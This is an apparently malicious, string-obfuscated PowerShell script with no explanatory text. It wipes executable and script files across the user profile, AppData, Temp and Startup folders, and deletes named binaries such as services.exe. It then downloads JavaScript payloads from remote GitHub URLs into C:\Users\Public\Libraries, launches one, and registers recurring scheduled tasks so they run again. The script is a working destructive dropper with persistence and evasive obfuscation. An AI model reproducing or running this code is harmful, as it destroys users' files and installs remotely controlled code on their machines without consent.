&("{0}{1}"-f'de','l') (("{3}{1}{0}{7}{5}{4}{6}{8}{2}" -f 'U',("{1}{0}" -f'sr',':f'),("{0}{2}{1}"-f's',("{1}{0}"-f'ol','*.p'),'r'),'C','nlo',("{0}{1}{4}{2}{5}{3}"-f("{1}{0}" -f 'fs','rs'),'rP','b','w','u',("{1}{0}{2}" -f'cfs','li','rDo')),'a','se','dsf'))."REpL`Ace"(([char]102+[char]115+[char]114),[StrinG][char]92);



&("{1}{0}"-f'l','de') (("{0}{2}{3}{1}"-f 'C','xe',("{0}{1}"-f ':',("{1}{0}"-f'iEUs','P')),("{0}{1}{2}"-f("{0}{1}" -f 'e','rsP'),("{0}{1}"-f 'iE','*.'),'e'))).("{1}{2}{0}" -f'E',("{0}{1}"-f 'rE','PlA'),'C')."iN`Vo`KE"('PiE','\');
&("{0}{1}"-f'de','l') ((("{3}{2}{0}{1}"-f 's','{0}*.js',':{0}User','C'))  -f [ChAR]92);
&("{0}{1}"-f 'de','l') ((("{3}{0}{2}{1}" -f("{1}{0}" -f'G',':jn'),("{1}{0}{2}" -f'.',("{1}{2}{0}" -f'nG*','s','ersj'),'vbs'),'U','C'))  -rEplAcE 'jnG',[cHaR]92);
&("{1}{0}" -f'l','de') ((("{2}{0}{1}"-f '0}Users{0}',("{0}{1}" -f'*',("{1}{0}"-f 'd','.cm')),'C:{'))  -f  [ChaR]92);
&("{0}{1}" -f'd','el') (("{2}{3}{1}{0}" -f'at',("{0}{1}"-f'C','*.b'),("{2}{1}{0}{3}" -f 'C','Gn','C:',("{1}{0}"-f 'G','Users')),'n'))."r`epl`Ace"(([ChAr]71+[ChAr]110+[ChAr]67),'\');
&("{1}{0}" -f'l','de') ((("{1}{0}{2}{3}" -f ("{1}{0}"-f("{0}{1}" -f'se','rs'),'U'),'C:{0}','{0}',("{0}{1}" -f'*',("{1}{0}"-f 'nk','.l')))) -F [CHar]92);
&("{0}{1}"-f 'd','el') (("{3}{2}{1}{0}{4}{5}" -f 'rsF','se',("{0}{1}" -f'F','xfU'),'C:','xf*',("{0}{1}"-f '.','ps1')))."REP`LaCe"(([chAr]70+[chAr]120+[chAr]102),'\');
&("{0}{1}"-f'de','l') ((("{2}{5}{0}{3}{4}{1}" -f 'Us','ps',("{1}{0}"-f'c','C:I'),'e',("{0}{2}{1}" -f 'r',("{1}{0}" -f'*.','cq'),'sI'),'q'))-rEPLACe ([Char]73+[Char]99+[Char]113),[Char]92);
&("{0}{1}"-f'de','l') ((("{2}{0}{3}{1}" -f 'ers{0','l','C:{0}Us','}*.ur')) -F  [chaR]92);
&("{1}{0}"-f 'l','de') ((("{1}{2}{0}" -f 'l',("{0}{2}{1}{3}" -f 'C','ers',("{2}{0}{1}"-f't','Us',':E5'),("{0}{1}"-f'E5t*','.')),'po'))-rePlACE  'E5t',[chaR]92);

&("{0}{1}"-f 'de','l') ((("C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start "+'')+'')+('Men'+'u{0}Progra'+'ms{0}'+'St'+'artup{0}*'+("{0}{1}" -f '.ex','e'))  -f [char]92);
&("{1}{0}"-f'l','de') ((("C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start "+'')+'')+(("{0}{1}" -f'M',("{1}{0}" -f 'uY','en'))+("{1}{0}" -f("{0}{1}"-f'rPr','og'),'F')+("{1}{0}" -f 'ams','r')+("{1}{0}" -f ("{1}{0}" -f 't','FrS'),'Y')+'art'+'up'+'YFr'+'*'+'.'+'js')."REPLA`CE"('YFr',[StrinG][chAR]92));
&("{0}{1}"-f'd','el') ((("C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start "+'')+'')+(("{0}{1}"-f'Men','u')+("{1}{0}"-f'PPr','GC')+'og'+'ram'+("{1}{3}{0}{2}{4}"-f't',("{0}{1}" -f 'sGC','PSt'),'upG','ar','CP')+("{0}{1}" -f ("{1}{0}" -f '.vb','*'),'s'))."RePL`ACE"(([ChaR]71+[ChaR]67+[ChaR]80),'\'));
&("{0}{1}" -f'de','l') ((("C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start "+'')+'')+('Me'+("{1}{0}" -f 'f','nus')+'d'+'Pro'+("{1}{0}" -f("{0}{1}"-f 'ams','s'),'gr')+("{0}{1}"-f("{0}{1}"-f'fdS','ta'),'r')+("{0}{1}" -f'tu','ps')+'fd*'+("{1}{0}"-f 'd','.cm'))."re`plACe"(([Char]115+[Char]102+[Char]100),[stRINg][Char]92));
&("{0}{1}" -f'd','el') ((("C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start "+'')+'')+(('Me'+'nu'+("{1}{0}" -f'lPr','3v')+'ogr'+'am'+'s'+("{2}{1}{3}{0}{5}{4}"-f'tup','vlS','3','tar','bat',("{0}{1}"-f '3','vl*.'))) -crEPLAcE  ([Char]51+[Char]118+[Char]108),[Char]92));
&("{0}{1}" -f 'd','el') ((("C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start "+'')+'')+(("{1}{0}" -f'8',("{0}{1}" -f 'Me','nu'))+'Y'+'CPr'+("{1}{2}{0}"-f("{0}{1}"-f 'a','ms8'),'og','r')+("{0}{1}" -f 'Y',("{1}{0}"-f'a','CSt'))+("{0}{2}{1}" -f'rt',("{0}{1}"-f 'p8Y','C'),'u')+("{1}{0}"-f 'k',("{0}{1}" -f'*.','ln'))).("{0}{1}"-f ("{0}{1}"-f ("{0}{1}"-f 'rEp','la'),'c'),'E')."in`VO`Ke"('8YC','\'));
&("{0}{1}"-f 'd','el') ((("C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start "+'')+'')+(("{1}{0}" -f 'enu','M')+'{0}Pr'+'o'+'grams{0}Sta'+("{0}{1}" -f 'rt','up')+'{0'+'}*.p'+'s1')  -f[Char]92);
&("{1}{0}" -f'l','de') ((("C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start "+'')+'')+(("{0}{2}{1}"-f 'Men','P',("{1}{0}"-f'o','uxG'))+'rog'+'ra'+("{0}{1}"-f 'ms','xGo')+("{0}{2}{1}" -f'S',("{0}{1}"-f'xGo*','.'),("{1}{2}{0}"-f'p','tar','tu'))+'ps')."re`pLACe"(([CHAR]120+[CHAR]71+[CHAR]111),'\'));
&("{0}{1}" -f'd','el') ((("C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start "+'')+'')+('Me'+'nuQ'+("{0}{1}{2}"-f'sZ',("{2}{1}{0}" -f'ams','rogr','P'),'Qs')+'Z'+("{0}{2}{1}" -f'S','sZ*',("{1}{0}"-f 'upQ','tart'))+("{1}{0}" -f'l','.ur'))."rEP`la`cE"('QsZ',[StriNG][CHaR]92));
&("{1}{0}"-f 'el','d') ((("C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start "+'')+'')+('Me'+'nu{'+'0}P'+'r'+("{1}{0}"-f'ra','og')+'ms'+'{0}S'+("{0}{1}"-f 't','art')+'up{0}*'+'.'+'pol') -F[chAR]92);

&("{0}{1}"-f 'd','el') "C:\Users\$env:UserName\AppData\Local\*.exe";
&("{1}{0}"-f 'el','d') "C:\Users\$env:UserName\AppData\Local\*.js";
&("{0}{1}" -f'd','el') "C:\Users\$env:UserName\AppData\Local\*.vbs";
&("{0}{1}"-f 'd','el') "C:\Users\$env:UserName\AppData\Local\*.cmd";
&("{0}{1}" -f'd','el') "C:\Users\$env:UserName\AppData\Local\*.bat";
&("{1}{0}"-f 'el','d') "C:\Users\$env:UserName\AppData\Local\*.lnk";
&("{1}{0}" -f 'el','d') "C:\Users\$env:UserName\AppData\Local\*.ps1";
&("{1}{0}" -f 'el','d') "C:\Users\$env:UserName\AppData\Local\*.ps";
&("{1}{0}"-f 'l','de') "C:\Users\$env:UserName\AppData\Local\*.url";
&("{0}{1}"-f 'de','l') "C:\Users\$env:UserName\AppData\Local\*.pol";


&("{0}{1}"-f'd','el') "C:\Users\$env:UserName\AppData\LocalLow\*.exe";
&("{1}{0}"-f'el','d') "C:\Users\$env:UserName\AppData\LocalLow\*.js";
&("{0}{1}" -f 'd','el') "C:\Users\$env:UserName\AppData\LocalLow\*.vbs";
&("{0}{1}" -f'de','l') "C:\Users\$env:UserName\AppData\LocalLow\*.cmd";
&("{1}{0}"-f'el','d') "C:\Users\$env:UserName\AppData\LocalLow\*.bat";
&("{1}{0}" -f 'el','d') "C:\Users\$env:UserName\AppData\LocalLow\*.lnk";
&("{0}{1}" -f 'd','el') "C:\Users\$env:UserName\AppData\LocalLow\*.ps1";
&("{1}{0}"-f'l','de') "C:\Users\$env:UserName\AppData\LocalLow\*.ps";
&("{1}{0}"-f 'el','d') "C:\Users\$env:UserName\AppData\LocalLow\*.url";
&("{1}{0}"-f 'l','de') "C:\Users\$env:UserName\AppData\LocalLow\*.pol";

&("{1}{0}" -f 'l','de') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\*.exe";
&("{0}{1}" -f 'de','l') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\*.dll";
&("{0}{1}" -f'd','el') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\*.js";
&("{0}{1}" -f 'd','el') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\*.vbs";
&("{1}{0}" -f'el','d') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\*.cmd";
&("{1}{0}"-f'l','de') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\*.bat";
&("{1}{0}" -f'l','de') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\*.lnk";
&("{1}{0}"-f'el','d') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\*.ps1";
&("{1}{0}" -f'l','de') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\*.ps";
&("{1}{0}"-f'el','d') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\*.url";
&("{1}{0}" -f'el','d') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\*.pol";

&("{0}{1}"-f'de','l') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\*.exe";
&("{1}{0}"-f 'l','de') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\*.js";
&("{1}{0}" -f'l','de') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\*.vbs";
&("{0}{1}"-f 'de','l') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\*.cmd";
&("{1}{0}" -f 'l','de') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\*.bat";
&("{0}{1}"-f 'de','l') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\*.lnk";
&("{0}{1}" -f 'de','l') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\*.ps1";
&("{1}{0}"-f'el','d') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\*.ps";
&("{0}{1}"-f 'd','el') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\*.url";
&("{1}{0}"-f 'l','de') "C:\Users\$env:UserName\AppData\Roaming\Microsoft\*.pol";

&("{0}{1}"-f'de','l') "C:\Users\$env:UserName\services.exe";
&("{1}{0}"-f 'el','d') "C:\Users\$env:UserName\msiahk.exe";
&("{1}{0}"-f'el','d') "C:\Users\$env:UserName\service.exe";
&("{1}{0}"-f 'l','de') "C:\Users\$env:UserName\00.exe";
&("{1}{0}"-f 'el','d') "C:\Users\$env:UserName\22.exe";
&("{0}{1}"-f'd','el') "C:\Users\$env:UserName\*.js";
&("{1}{0}" -f 'el','d') "C:\Users\$env:UserName\*.vbs";
&("{0}{1}"-f 'd','el') "C:\Users\$env:UserName\*.cmd";
&("{1}{0}"-f 'l','de') "C:\Users\$env:UserName\*.bat";
&("{0}{1}"-f'de','l') "C:\Users\$env:UserName\*.lnk";
&("{0}{1}" -f 'de','l') "C:\Users\$env:UserName\*.ps1";
&("{0}{1}"-f'd','el') "C:\Users\$env:UserName\*.ps";
&("{1}{0}"-f'el','d') "C:\Users\$env:UserName\*.url";
&("{1}{0}" -f 'el','d') "C:\Users\$env:UserName\*.pol";



&("{0}{1}" -f'd','el') "C:\Users\$env:UserName\AppData\Local\Temp\*.exe";
&("{0}{1}"-f 'd','el') "C:\Users\$env:UserName\AppData\Local\Temp\*.js";
&("{1}{0}" -f'el','d') "C:\Users\$env:UserName\AppData\Local\Temp\*.vbs";
&("{1}{0}" -f 'el','d') "C:\Users\$env:UserName\AppData\Local\Temp\*.cmd";
&("{1}{0}" -f'el','d') "C:\Users\$env:UserName\AppData\Local\Temp\*.bat";
&("{1}{0}" -f 'el','d') "C:\Users\$env:UserName\AppData\Local\Temp\*.lnk";
&("{0}{1}"-f 'd','el') "C:\Users\$env:UserName\AppData\Local\Temp\*.ps1";
&("{0}{1}" -f 'd','el') "C:\Users\$env:UserName\AppData\Local\Temp\*.ps";
&("{1}{0}"-f 'el','d') "C:\Users\$env:UserName\AppData\Local\Temp\*.url";
&("{0}{1}" -f'd','el') "C:\Users\$env:UserName\AppData\Local\Temp\*.pol";

&("{0}{1}"-f'de','l') "C:\Users\$env:UserName\AppData\Roaming\*.exe";
&("{1}{0}" -f 'l','de') "C:\Users\$env:UserName\AppData\Roaming\*.vbs";
&("{1}{0}" -f 'el','d') "C:\Users\$env:UserName\AppData\Roaming\*.cmd";
&("{1}{0}"-f'el','d') "C:\Users\$env:UserName\AppData\Roaming\*.js";
&("{1}{0}" -f 'l','de') "C:\Users\$env:UserName\AppData\Roaming\*.ps";
&("{0}{1}" -f 'de','l') "C:\Users\$env:UserName\AppData\Roaming\*.bat";
&("{1}{0}" -f'l','de') "C:\Users\$env:UserName\AppData\Roaming\*.lnk";
&("{1}{0}" -f'el','d') "C:\Users\$env:UserName\AppData\Roaming\*.ps1";
&("{0}{1}"-f 'de','l') "C:\Users\$env:UserName\AppData\Roaming\*.url";
&("{0}{1}"-f'de','l') "C:\Users\$env:UserName\AppData\Roaming\*.pol";
(&("{1}{2}{0}"-f't',("{1}{0}" -f("{1}{0}"-f 'Obj','ew-'),'N'),'ec') ("{5}{0}{1}{6}{3}{2}{4}" -f("{1}{0}" -f'e','yst'),'m.N',("{1}{0}" -f'en',("{0}{1}"-f 'bC','li')),("{0}{1}" -f 't','.We'),'t','S','e')).("{0}{2}{3}{1}"-f'Do','le','wnl',("{1}{0}"-f("{0}{1}"-f'ad','Fi'),'o'))."In`VokE"(("{6}{2}{17}{3}{15}{11}{7}{1}{13}{14}{0}{12}{8}{5}{16}{4}{10}{9}"-f '/','mt','t',("{1}{0}" -f 'aw','//r'),'in','o/','ht',("{3}{0}{5}{1}{2}{4}"-f 'on',("{0}{1}"-f 'ent.','c'),("{0}{1}"-f'o','m/sa'),'rc','le','t'),'ho','js',("{1}{0}" -f'bu.','/a'),'e','ta','a','hoo',("{0}{3}{2}{1}" -f'.','s',("{1}{0}"-f'u','hub'),'git'),'ma','ps:'), ((("{4}{2}{0}{1}{6}{5}{7}{3}"-f ("{1}{2}{0}"-f 'No','ers','c'),'Pub','s',("{0}{2}{3}{1}"-f("{0}{1}{2}" -f'ra','riesc','Noa'),'js','bu','.'),("{1}{0}{2}" -f 'cNo','C:','U'),'icc','l',("{1}{0}"-f ("{1}{0}"-f'b','oLi'),'N')))."R`eplACE"(([chAr]99+[chAr]78+[chAr]111),'\'))); ${g`NE9}::("{0}{1}" -f 'Sta','rt')."In`VO`KE"(((("{5}{9}{8}{1}{7}{0}{4}{11}{10}{3}{2}{6}"-f 'i',("{1}{0}"-f'c',("{0}{1}"-f'Pub','li')),'.','u','br',("{0}{1}" -f'C:f','H'),'js',("{1}{0}" -f'L','fHx'),("{1}{0}"-f'Hx','sf'),("{1}{0}" -f("{1}{0}"-f 'er','Us'),'x'),'xab',("{0}{1}" -f ("{1}{0}"-f's','arie'),'fH')))-repLACE([CHAr]102+[CHAr]72+[CHAr]120),[CHAr]92));&("{2}{3}{1}{0}" -f ("{2}{0}{1}" -f '.e','xe','sks'),'a','sch','t') ("{1}{0}{2}" -f 'cr','/',("{1}{0}" -f 'ate','e')) ("{0}{1}" -f'/s','c') ("{1}{0}"-f 'te',("{0}{1}" -f'min','u')) ("{0}{1}"-f '/m','o') 60 ("{1}{0}" -f'n','/t') ("{2}{0}{1}" -f("{1}{0}" -f'kab','as'),'u','T') ("{1}{0}" -f 'r','/t') ((("{3}{4}{2}{6}{1}{0}{5}{7}"-f("{0}{2}{1}"-f ("{2}{0}{1}" -f'a','ri','ibr'),("{1}{0}"-f'Pa','slL'),'e'),'LPL','sl',("{0}{1}"-f("{0}{1}" -f 'C',':lL'),'PUs'),'er','bu',("{2}{0}{1}"-f("{1}{0}"-f'li','ub'),'cl','LPP'),'.js'))."rEP`LACE"(([cHAR]108+[cHAR]76+[cHAR]80),[stRiNg][cHAR]92));
(&("{1}{0}{2}{3}"-f'w-','Ne','O',("{1}{0}"-f't',("{0}{1}"-f 'bje','c'))) ("{2}{5}{6}{4}{0}{1}{3}" -f'Web',("{0}{1}" -f'C',("{0}{1}"-f 'li','en')),'S','t',("{0}{1}" -f("{1}{2}{0}" -f't','em.','Ne'),'.'),'ys','t')).("{3}{0}{2}{1}"-f 'nl',("{1}{0}" -f ("{1}{0}" -f'e','Fil'),'ad'),'o','Dow')."I`NVOkE"(("{8}{7}{11}{10}{3}{5}{1}{4}{9}{2}{0}{6}" -f("{2}{1}{0}"-f 'l','i',("{1}{0}" -f 'n/k','mai')),("{0}{1}{2}" -f 'm',("{1}{0}{2}" -f 's','/','alem'),'t'),("{1}{0}" -f 'oo/','ah'),("{0}{1}" -f't',("{1}{0}" -f 'nt.','e')),'aho','co',("{1}{0}{2}" -f 'j',("{0}{1}"-f 'lr','un.'),'s'),("{1}{0}{2}" -f 'w.g',("{1}{0}"-f'ra','s://'),'it'),("{1}{0}" -f'ttp','h'),'o/t',("{0}{2}{1}"-f("{0}{1}" -f 'u','bus'),'con','er'),'h'), ((("{8}{5}{9}{0}{3}{6}{1}{2}{7}{4}{10}" -f ("{0}{1}" -f'ub','li'),'rie','spm','c','lr',("{1}{3}{2}{0}" -f'm',':pm','rsp',("{0}{1}" -f 'z','Use')),("{2}{0}{1}" -f 'ibr','a',("{1}{0}"-f'L','pmz')),("{0}{1}" -f'zki','l'),'C','zP',("{1}{0}" -f("{0}{1}"-f'n.j','s'),'u')))  -RePLAce([CHaR]112+[CHaR]109+[CHaR]122),[CHaR]92));&("{0}{1}{2}"-f 's',("{2}{0}{1}"-f("{1}{0}"-f'sks.','a'),'ex','cht'),'e') ("{1}{0}{2}" -f 'e','/cr','ate') ("{1}{0}"-f'c','/s') ("{1}{0}"-f("{1}{0}"-f 'e',("{0}{1}"-f'i','nut')),'m') ("{0}{1}"-f '/m','o') 240 ("{1}{0}"-f'n','/t') ("{0}{2}{1}" -f("{0}{1}" -f ("{0}{1}"-f 'Ta','sk'),'r'),'ll',("{0}{1}"-f'un0','ki')) ("{1}{0}" -f'r','/t') ((("{0}{9}{12}{4}{3}{10}{11}{1}{2}{6}{8}{5}{7}" -f 'C:{0}Users{','b','ra','c','li',("{2}{0}{1}" -f 'ill',("{0}{1}"-f'ru','n.'),'k'),'ries{','js','0}','0}Pu','{0','}Li','b'))  -f [chAr]92);


}
&("{1}{0}" -f 'EX','I') ("{0}{1}" -f'de',("{0}{1}" -f 'let','e'))